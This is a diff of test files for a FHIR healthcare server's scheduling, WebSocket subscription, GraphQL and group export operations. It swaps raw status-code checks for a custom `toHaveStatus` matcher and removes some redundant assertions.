       schedule: [`Schedule/${practitionerSchedule.id}`, `Schedule/${locationSchedule.id}`],
     });
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
 
     expect(response.body).toMatchObject({
@@ -1169,7 +1162,6 @@ describe('Appointment/$find', () => {
       schedule: [`Schedule/${schedule.id}`],
       'service-type-reference': `HealthcareService/${genericVisit.id}`,
     });
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
     expect(response.body).toMatchObject({
       resourceType: 'Bundle',
@@ -1201,7 +1193,6 @@ describe('Appointment/$find', () => {
       schedule: `Schedule/${practitionerSchedule.id}`,
     });
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
     expect(response.body.entry).toHaveLength(20);
   });
@@ -1227,7 +1218,6 @@ describe('Appointment/$find', () => {
       _count: '1',
     });
 
-    expect(smallResponse.body).not.toHaveProperty('issue');
     expect(smallResponse).toHaveStatus(200);
     expect(smallResponse.body.entry).toHaveLength(1);
 
@@ -1239,7 +1229,6 @@ describe('Appointment/$find', () => {
       _count: '1000',
     });
 
-    expect(largeResponse.body).not.toHaveProperty('issue');
     expect(largeResponse).toHaveStatus(200);
     expect(largeResponse.body.entry).toHaveLength(1000);
   });
@@ -1341,7 +1330,6 @@ describe('Appointment/$find', () => {
         'service-type-reference': `HealthcareService/${emptyService.id}`,
       });
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
     expect(response.body).toHaveProperty('entry');
     expect(response.body.entry).toHaveLength(4);

--- a/packages/server/src/fhir/operations/getwsbindingtoken.test.ts
+++ b/packages/server/src/fhir/operations/getwsbindingtoken.test.ts
@@ -40,7 +40,7 @@ describe('Get WebSocket binding token', () => {
           },
         } satisfies Subscription);
       const createdSub = res1.body as Subscription;
-      expect(res1.status).toBe(201);
+      expect(res1).toHaveStatus(201);
       expect(createdSub).toBeDefined();
       expect(createdSub.id).toBeDefined();
 
@@ -48,7 +48,7 @@ describe('Get WebSocket binding token', () => {
       const res2 = await request(app)
         .get(`/fhir/R4/Subscription/${createdSub.id}/$get-ws-binding-token`)
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res2.status).toBe(200);
+      expect(res2).toHaveStatus(200);
       expect(res2.body).toBeDefined();
 
       const params = res2.body as Parameters;
@@ -100,7 +100,7 @@ describe('Get WebSocket binding token', () => {
           },
         } satisfies Subscription);
       const createdSub = res1.body as Subscription;
-      expect(res1.status).toBe(201);
+      expect(res1).toHaveStatus(201);
       expect(createdSub).toBeDefined();
       expect(createdSub.id).toBeDefined();
 
@@ -140,7 +140,7 @@ describe('Get WebSocket binding token', () => {
         },
       } satisfies Subscription);
     const createdSub = res1.body as Subscription;
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     expect(createdSub).toBeDefined();
     expect(createdSub.id).toBeDefined();
 
@@ -174,7 +174,7 @@ describe('Get WebSocket binding token', () => {
         },
       } satisfies Subscription);
     const createdSub = res1.body as Subscription;
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     expect(createdSub).toBeDefined();
     expect(createdSub.id).toBeDefined();
 
@@ -208,14 +208,14 @@ describe('Get WebSocket binding token', () => {
             endpoint: 'https://example.com/hook',
           },
         } satisfies Subscription);
-      expect(res1.status).toBe(201);
+      expect(res1).toHaveStatus(201);
       const createdSub = res1.body as Subscription;
 
       const res2 = await request(app)
         .get(`/fhir/R4/Subscription/${createdSub.id}/$get-ws-binding-token`)
         .set('Authorization', 'Bearer ' + accessToken);
 
-      expect(res2.status).toBe(400);
+      expect(res2).toHaveStatus(400);
       expect(res2.body).toMatchObject<OperationOutcome>({
         resourceType: 'OperationOutcome',
         issue: [
@@ -244,14 +244,14 @@ describe('Get WebSocket binding token', () => {
             type: 'websocket',
           },
         } satisfies Subscription);
-      expect(res1.status).toBe(201);
+      expect(res1).toHaveStatus(201);
       const createdSub = res1.body as Subscription;
 
       const res2 = await request(app)
         .get(`/fhir/R4/Subscription/${createdSub.id}/$get-ws-binding-token`)
         .set('Authorization', 'Bearer ' + accessToken);
 
-      expect(res2.status).toBe(400);
+      expect(res2).toHaveStatus(400);
       expect(res2.body).toMatchObject<OperationOutcome>({
         resourceType: 'OperationOutcome',
         issue: [
@@ -285,7 +285,7 @@ describe('Get WebSocket binding token', () => {
       .get(`/fhir/R4/Subscription/${createdSub.id}/$get-ws-binding-token`)
       .set('Authorization', 'Bearer ' + projectAccessToken);
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
       issue: [{ severity: 'error', code: 'invalid', details: { text: 'Invalid empty Subscription criteria' } }],

--- a/packages/server/src/fhir/operations/getwssubprojectstats.test.ts
+++ b/packages/server/src/fhir/operations/getwssubprojectstats.test.ts
@@ -31,7 +31,7 @@ describe('$get-ws-sub-project-stats', () => {
       .get('/fhir/R4/$get-ws-sub-project-stats')
       .query({ projectId: randomUUID() })
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Returns 400 when projectId is missing', async () => {
@@ -40,7 +40,7 @@ describe('$get-ws-sub-project-stats', () => {
     const res = await request(app)
       .get('/fhir/R4/$get-ws-sub-project-stats')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Returns empty resource types for unknown project', async () => {
@@ -50,7 +50,7 @@ describe('$get-ws-sub-project-stats', () => {
       .get('/fhir/R4/$get-ws-sub-project-stats')
       .query({ projectId: randomUUID() })
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const params = res.body as Parameters;
     const statsStr = params.parameter?.find((p) => p.name === 'stats')?.valueString;
@@ -111,7 +111,7 @@ describe('$get-ws-sub-project-stats', () => {
         .get('/fhir/R4/$get-ws-sub-project-stats')
         .query({ projectId })
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
 
       const params = res.body as Parameters;
       const statsStr = params.parameter?.find((p) => p.name === 'stats')?.valueString;
@@ -183,7 +183,7 @@ describe('$get-ws-sub-project-stats', () => {
         .get('/fhir/R4/$get-ws-sub-project-stats')
         .query({ projectId })
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
 
       const params = res.body as Parameters;
       const statsStr = params.parameter?.find((p) => p.name === 'stats')?.valueString;

--- a/packages/server/src/fhir/operations/getwssubstats.test.ts
+++ b/packages/server/src/fhir/operations/getwssubstats.test.ts
@@ -30,7 +30,7 @@ describe('$get-ws-sub-stats', () => {
     const res = await request(app)
       .get('/fhir/R4/$get-ws-sub-stats')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Returns empty stats when no subscriptions exist for test key prefix', async () => {
@@ -39,7 +39,7 @@ describe('$get-ws-sub-stats', () => {
     const res = await request(app)
       .get('/fhir/R4/$get-ws-sub-stats')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const params = res.body as Parameters;
     const statsStr = params.parameter?.find((p) => p.name === 'stats')?.valueString;
@@ -69,7 +69,7 @@ describe('$get-ws-sub-stats', () => {
       const res = await request(app)
         .get('/fhir/R4/$get-ws-sub-stats')
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
 
       const params = res.body as Parameters;
       const statsStr = params.parameter?.find((p) => p.name === 'stats')?.valueString;
@@ -132,7 +132,7 @@ describe('$get-ws-sub-stats', () => {
       const res = await request(app)
         .get('/fhir/R4/$get-ws-sub-stats')
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
 
       const params = res.body as Parameters;
       const statsStr = params.parameter?.find((p) => p.name === 'stats')?.valueString;

--- a/packages/server/src/fhir/operations/graphql.test.ts
+++ b/packages/server/src/fhir/operations/graphql.test.ts
@@ -238,7 +238,7 @@ describe('GraphQL', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send(introspectionRequest);
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.headers['cache-control']).toBe('public, max-age=31536000');
     expect(res1.text).toMatch(/_count/);
     expect(res1.text).toMatch(/_sort/);
@@ -249,7 +249,7 @@ describe('GraphQL', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send(introspectionRequest);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.text).toStrictEqual(res1.text);
   });
 
@@ -268,7 +268,7 @@ describe('GraphQL', () => {
           }
         }`,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['cache-control']).toBe('public, max-age=31536000');
   });
 
@@ -286,7 +286,7 @@ describe('GraphQL', () => {
           }
         }`,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('application/json; charset=utf-8');
     expect(res.headers['cache-control']).toBe('no-store, no-cache, must-revalidate');
   });
@@ -307,7 +307,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.Patient).toBeDefined();
     expect(res.body.data.Patient.photo[0].url).toBeDefined();
     expect(res.body.data.Patient.photo[0].url).toMatch(/^http/);
@@ -328,7 +328,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.Patient).toBeNull();
     expect(res.body.errors[0].message).toStrictEqual('Not found');
   });
@@ -348,7 +348,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.PatientList).toBeDefined();
   });
 
@@ -366,7 +366,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.PatientList).toBeDefined();
     expect(res.body.data.PatientList.length).toBe(1);
   });
@@ -386,7 +386,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.PatientList).toBeDefined();
   });
 
@@ -404,7 +404,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.EncounterList).toBeDefined();
     expect(res.body.data.EncounterList.length).toBe(1);
   });
@@ -423,7 +423,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.EncounterList).toBeDefined();
     expect(res.body.data.EncounterList.length).toBe(1);
   });
@@ -443,7 +443,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.EncounterList).toBeDefined();
     expect(res.body.data.EncounterList.length >= 2).toBe(true);
 
@@ -467,7 +467,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.EncounterList).toBeDefined();
     expect(res.body.data.EncounterList.length >= 2).toBe(true);
 
@@ -505,7 +505,7 @@ describe('GraphQL', () => {
         }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.Encounter).toBeDefined();
   });
 
@@ -538,7 +538,7 @@ describe('GraphQL', () => {
         }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.Encounter).toBeDefined();
     expect(res.body.data.Encounter.subject.resource).toBeNull();
   });
@@ -564,7 +564,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.PatientList).toBeDefined();
     expect(res.body.data.PatientList[0].ObservationList).toBeDefined();
   });
@@ -590,7 +590,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test.skip('Max depth', async () => {
@@ -630,7 +630,7 @@ describe('GraphQL', () => {
         }
     `,
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     // 10 levels of nesting is too much
     const res2 = await request(app)
@@ -688,7 +688,7 @@ describe('GraphQL', () => {
         }
     `,
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue[0].details.text).toStrictEqual('Field "id" exceeds max depth (depth=13, max=12)');
   });
 
@@ -726,7 +726,7 @@ describe('GraphQL', () => {
         }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.EncounterList).toBeDefined();
     expect(res.body.data.EncounterList).toHaveLength(2);
 
@@ -750,7 +750,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.Practitioner).toBeNull();
   });
 
@@ -779,7 +779,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.Patient).toBeDefined();
     expect(res.body.data.Patient.generalPractitioner[0].resource).toBeNull();
   });
@@ -799,7 +799,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.ServiceRequest).toBeNull();
   });
 
@@ -826,7 +826,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.Encounter).toBeDefined();
     expect(res.body.data.Encounter.basedOn[0].resource).toBeNull();
   });
@@ -848,7 +848,7 @@ describe('GraphQL', () => {
         resourceType: 'Patient',
         name: [{ given: ['Alice'], family: 'Smith' }],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // GraphQL request with one search is ok
     const res2 = await request(app)
@@ -864,7 +864,7 @@ describe('GraphQL', () => {
         }
     `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.data.PatientList).toHaveLength(1);
 
     // GraphQL request with nested search is not ok
@@ -886,7 +886,7 @@ describe('GraphQL', () => {
         }
     `,
       });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.data.PatientList).toHaveLength(1);
     expect(res3.body.data.PatientList[0].encounters).toBeNull();
     expect(res3.body.errors).toHaveLength(1);
@@ -911,7 +911,7 @@ describe('GraphQL', () => {
               }
             }`,
         });
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
 
       return res.body.data;
     }
@@ -1149,7 +1149,7 @@ describe('GraphQL', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ query: `{ PatientList(_id: "${patient.id}") { id } }` });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(readerSpy).toHaveBeenCalledTimes(1);
     expect(writerSpy).toHaveBeenCalledTimes(0);
   });
@@ -1178,7 +1178,7 @@ describe('GraphQL', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(batch);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
     expect(res.body.entry[0].resource.data.PatientList).toHaveLength(1);
     expect(res.body.entry[0].resource.data.PatientList[0].id).toBe(patient.id);
@@ -1209,7 +1209,7 @@ describe('GraphQL', () => {
           }
         `,
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.data.EncounterConnection.edges).toHaveLength(1);
     const firstId = res1.body.data.EncounterConnection.edges[0].resource.id;
     expect([encounter1.id, encounter2.id]).toContain(firstId);
@@ -1233,7 +1233,7 @@ describe('GraphQL', () => {
           }
         `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.data.EncounterConnection.edges).toHaveLength(1);
     const secondId = res2.body.data.EncounterConnection.edges[0].resource.id;
     expect([encounter1.id, encounter2.id]).toContain(secondId);
@@ -1250,7 +1250,7 @@ describe('GraphQL', () => {
         name: [{ text: 'Charlie Smith' }],
         generalPractitioner: [createReference(practitioner)],
       } satisfies Patient);
-    expect(patRes.status).toBe(201);
+    expect(patRes).toHaveStatus(201);
 
     const redis = getCacheRedis();
     const mgetSpy = vi.spyOn(redis, 'mget');
@@ -1273,7 +1273,7 @@ describe('GraphQL', () => {
       }
     `,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.data.PatientList).toBeDefined();
     // Only one instance of the practitioner ID should be looked up
     expect(mgetSpy).toHaveBeenCalledWith([getReferenceString(practitioner)]);

--- a/packages/server/src/fhir/operations/groupexport.test.ts
+++ b/packages/server/src/fhir/operations/groupexport.test.ts
@@ -44,7 +44,7 @@ describe('Group Export', () => {
           { system: 'email', value: 'alice@example.com' },
         ],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // Create second patient
     const res2 = await request(app)
@@ -60,7 +60,7 @@ describe('Group Export', () => {
           { system: 'email', value: 'bob@example.com' },
         ],
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // Create observation
     const res3 = await request(app)
@@ -73,7 +73,7 @@ describe('Group Export', () => {
         code: { text: 'test' },
         subject: { reference: `Patient/${res1.body.id}` },
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     // Create device
     const res4 = await request(app)
@@ -83,7 +83,7 @@ describe('Group Export', () => {
       .send({
         resourceType: 'Device',
       });
-    expect(res4.status).toBe(201);
+    expect(res4).toHaveStatus(201);
 
     // Create a group
     const res5 = await request(app)
@@ -100,13 +100,13 @@ describe('Group Export', () => {
           { entity: { reference: `Device/${res4.body.id}` } },
         ],
       });
-    expect(res5.status).toBe(201);
+    expect(res5).toHaveStatus(201);
 
     // Start the export
     const res6 = await request(app)
       .get(`/fhir/R4/Group/${res5.body.id}/$export`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res6.status).toBe(202);
+    expect(res6).toHaveStatus(202);
     expect(res6.headers['content-location']).toBeDefined();
 
     const exportResult = await waitForAsyncJob(res6.headers['content-location'], app, accessToken);
@@ -129,7 +129,7 @@ describe('Group Export', () => {
         resourceType: 'Patient',
         name: [{ given: ['Alice'], family: 'Smith' }],
       });
-    expect(patientRes.status).toBe(201);
+    expect(patientRes).toHaveStatus(201);
 
     const groupRes = await request(app)
       .post(`/fhir/R4/Group`)
@@ -141,14 +141,14 @@ describe('Group Export', () => {
         actual: true,
         member: [{ entity: { reference: `Patient/${patientRes.body.id}` } }],
       });
-    expect(groupRes.status).toBe(201);
+    expect(groupRes).toHaveStatus(201);
 
     const exportRes = await request(app)
       .post(`/fhir/R4/Group/${groupRes.body.id}/$export`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(exportRes.status).toBe(202);
+    expect(exportRes).toHaveStatus(202);
     expect(exportRes.headers['content-location']).toBeDefined();
     await waitForAsyncJob(exportRes.headers['content-location'], app, accessToken);
   });
@@ -176,7 +176,7 @@ describe('Group Export', () => {
           { system: 'email', value: 'alice@example.com' },
         ],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // Create observation
     // (Use extended mode to get the project metadata)
@@ -191,7 +191,7 @@ describe('Group Export', () => {
         code: { text: 'test' },
         subject: { reference: `Patient/${res1.body.id}` },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // Create observation "3 days ago"
     // (Use systemRepo to set meta.lastUpdated)
@@ -218,13 +218,13 @@ describe('Group Export', () => {
         actual: true,
         member: [{ entity: { reference: `Patient/${res1.body.id}` } }],
       });
-    expect(res4.status).toBe(201);
+    expect(res4).toHaveStatus(201);
 
     // Start the export with the "_since" filter
     const res5 = await request(app)
       .get(`/fhir/R4/Group/${res4.body.id}/$export?_since=${encodeURIComponent(since.toISOString())}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res5.status).toBe(202);
+    expect(res5).toHaveStatus(202);
     expect(res5.headers['content-location']).toBeDefined();
 
     const exportResult = await waitForAsyncJob(res5.headers['content-location'], app, accessToken);
@@ -260,7 +260,7 @@ describe('Group Export', () => {
           { system: 'email', value: 'alice@example.com' },
         ],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // Create observation
     // (Use extended mode to get the project metadata)
@@ -275,7 +275,7 @@ describe('Group Export', () => {
         code: { text: 'test' },
         subject: { reference: `Patient/${res1.body.id}` },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // Create group
     const res3 = await request(app)
@@ -288,13 +288,13 @@ describe('Group Export', () => {
         actual: true,
         member: [{ entity: { reference: `Patient/${res1.body.id}` } }],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     // Start the export with the "_type" filter
     const res4 = await request(app)
       .get(`/fhir/R4/Group/${res3.body.id}/$export?_type=Patient`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(202);
+    expect(res4).toHaveStatus(202);
     expect(res4.headers['content-location']).toBeDefined();
 
     const exportResult = await waitForAsyncJob(res4.headers['content-location'], app, accessToken);
@@ -316,11 +316,11 @@ describe('Group Export', () => {
         actual: true,
         member: [{ entity: { reference: `Patient/1234` } }],
       });
-    expect(groupRes.status).toBe(201);
+    expect(groupRes).toHaveStatus(201);
     const res4 = await request(app)
       .get(`/fhir/R4/Group/${groupRes.body.id}/$export`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(202);
+    expect(res4).toHaveStatus(202);
     expect(res4.headers['content-location']).toBeDefined();
     await waitForAsyncJob(res4.headers['content-location'], app, accessToken);
   });

--- a/packages/server/src/fhir/operations/hold.test.ts
+++ b/packages/server/src/fhir/operations/hold.test.ts
@@ -199,7 +199,6 @@ describe('Appointment/$hold', () => {
       .set('Authorization', `Bearer ${project.accessToken}`)
       .send(holdParams({ schedule, start: '2026-01-15T14:00:00Z', end: '2026-01-15T15:00:00Z' }));
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(201);
   });
 
@@ -284,7 +283,6 @@ describe('Appointment/$hold', () => {
         ],
       });
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(201);
 
     const entries = ((response.body as Bundle).entry ?? []).map((e) => e.resource).filter(isDefined);
@@ -886,7 +884,6 @@ describe('Appointment/$hold', () => {
         ],
       });
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(201);
 
     const entries = ((response.body as Bundle).entry ?? []).map((e) => e.resource).filter(isDefined);
@@ -928,7 +925,6 @@ describe('Appointment/$hold', () => {
           })
         );
 
-      expect(response.body).not.toHaveProperty('issue');
       expect(response).toHaveStatus(201);
 
       const entries = ((response.body as Bundle).entry ?? []).map((e) => e.resource).filter(isDefined);
@@ -1307,7 +1303,6 @@ describe('scheduling flow integration test', () => {
         schedule: `Schedule/${schedule.id}`,
       });
 
-    expect(findResponse.body).not.toHaveProperty('issue');
     expect(findResponse).toHaveStatus(200);
     expect(findResponse.body).toHaveProperty('entry');
     expect(findResponse.body.entry).toHaveLength(4);
@@ -1326,7 +1321,6 @@ describe('scheduling flow integration test', () => {
         ],
       });
 
-    expect(bookResponse.body).not.toHaveProperty('issue');
     expect(bookResponse).toHaveStatus(201);
   });
 });

--- a/packages/server/src/fhir/operations/hold.test.ts
+++ b/packages/server/src/fhir/operations/hold.test.ts
@@ -200,7 +200,7 @@ describe('Appointment/$hold', () => {
       .send(holdParams({ schedule, start: '2026-01-15T14:00:00Z', end: '2026-01-15T15:00:00Z' }));
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(201);
+    expect(response).toHaveStatus(201);
   });
 
   test('creates a "pending" Appointment and "busy-tentative" Slot', async () => {
@@ -213,7 +213,7 @@ describe('Appointment/$hold', () => {
       .set('Authorization', `Bearer ${project.accessToken}`)
       .send(holdParams({ schedule, start, end }));
 
-    expect(response.status).toEqual(201);
+    expect(response).toHaveStatus(201);
 
     const entries = ((response.body as Bundle).entry ?? []).map((e) => e.resource).filter(isDefined);
 
@@ -285,7 +285,7 @@ describe('Appointment/$hold', () => {
       });
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(201);
+    expect(response).toHaveStatus(201);
 
     const entries = ((response.body as Bundle).entry ?? []).map((e) => e.resource).filter(isDefined);
     const tentativeSlots = entries.filter(isSlot).filter((s) => s.status === 'busy-tentative');
@@ -329,7 +329,7 @@ describe('Appointment/$hold', () => {
         ],
       });
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toHaveProperty('issue', [
       expect.objectContaining({
         code: 'invalid',
@@ -374,7 +374,7 @@ describe('Appointment/$hold', () => {
     expect(response.body).toHaveProperty('issue', [
       expect.objectContaining({ severity: 'error', details: { text: 'Appointment has no service reference' } }),
     ]);
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('rejects when appointment has no contained Slot resources', async () => {
@@ -404,7 +404,7 @@ describe('Appointment/$hold', () => {
         details: { text: 'Appointment has no contained Slot resources' },
       }),
     ]);
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('rejects when appointment already has references in `slot`', async () => {
@@ -448,7 +448,7 @@ describe('Appointment/$hold', () => {
         details: { text: 'Proposed appointment must not have Slot references' },
       }),
     ]);
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('rejects when contained has no Slot resources', async () => {
@@ -473,7 +473,7 @@ describe('Appointment/$hold', () => {
         ],
       });
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toHaveProperty('issue', [
       expect.objectContaining({
         severity: 'error',
@@ -527,7 +527,7 @@ describe('Appointment/$hold', () => {
         ],
       });
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toHaveProperty('issue', [
       expect.objectContaining({
         severity: 'error',
@@ -581,7 +581,7 @@ describe('Appointment/$hold', () => {
         ],
       });
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toHaveProperty('issue', [
       expect.objectContaining({
         severity: 'error',
@@ -630,7 +630,7 @@ describe('Appointment/$hold', () => {
         expression: ['Parameters.appointment.contained[0].schedule'],
       }),
     ]);
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('rejects when slot duration does not match scheduling parameters', async () => {
@@ -665,7 +665,7 @@ describe('Appointment/$hold', () => {
         ],
       });
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toHaveProperty('issue', [
       expect.objectContaining({
         severity: 'error',
@@ -689,7 +689,7 @@ describe('Appointment/$hold', () => {
         })
       );
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toHaveProperty('issue', [
       expect.objectContaining({
         severity: 'error',
@@ -718,7 +718,7 @@ describe('Appointment/$hold', () => {
       .set('Authorization', `Bearer ${project.accessToken}`)
       .send(holdParams({ schedule, start, end }));
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toHaveProperty('issue', [
       expect.objectContaining({
         severity: 'error',
@@ -752,7 +752,7 @@ describe('Appointment/$hold', () => {
       .set('Authorization', `Bearer ${project.accessToken}`)
       .send(holdParams({ schedule, start, end }));
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('rejects when there are no embedded "busy" slots for a schedule', async () => {
@@ -794,7 +794,7 @@ describe('Appointment/$hold', () => {
         details: { text: "Expected exactly one 'busy' slot per schedule" },
       }),
     ]);
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('rejects when there are multiple embedded "busy" slots for the same schedule', async () => {
@@ -845,7 +845,7 @@ describe('Appointment/$hold', () => {
         expression: ['Parameters.appointment.contained[0]', 'Parameters.appointment.contained[1]'],
       }),
     ]);
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('with a patient participant preserved in the created appointment', async () => {
@@ -887,7 +887,7 @@ describe('Appointment/$hold', () => {
       });
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(201);
+    expect(response).toHaveStatus(201);
 
     const entries = ((response.body as Bundle).entry ?? []).map((e) => e.resource).filter(isDefined);
     const appointments = entries.filter(isAppointment);
@@ -929,7 +929,7 @@ describe('Appointment/$hold', () => {
         );
 
       expect(response.body).not.toHaveProperty('issue');
-      expect(response.status).toEqual(201);
+      expect(response).toHaveStatus(201);
 
       const entries = ((response.body as Bundle).entry ?? []).map((e) => e.resource).filter(isDefined);
       const slots = entries.filter(isSlot);
@@ -987,7 +987,7 @@ describe('Appointment/$hold', () => {
           details: { text: 'Requested time slot is not available' },
         }),
       ]);
-      expect(response.status).toEqual(400);
+      expect(response).toHaveStatus(400);
     });
 
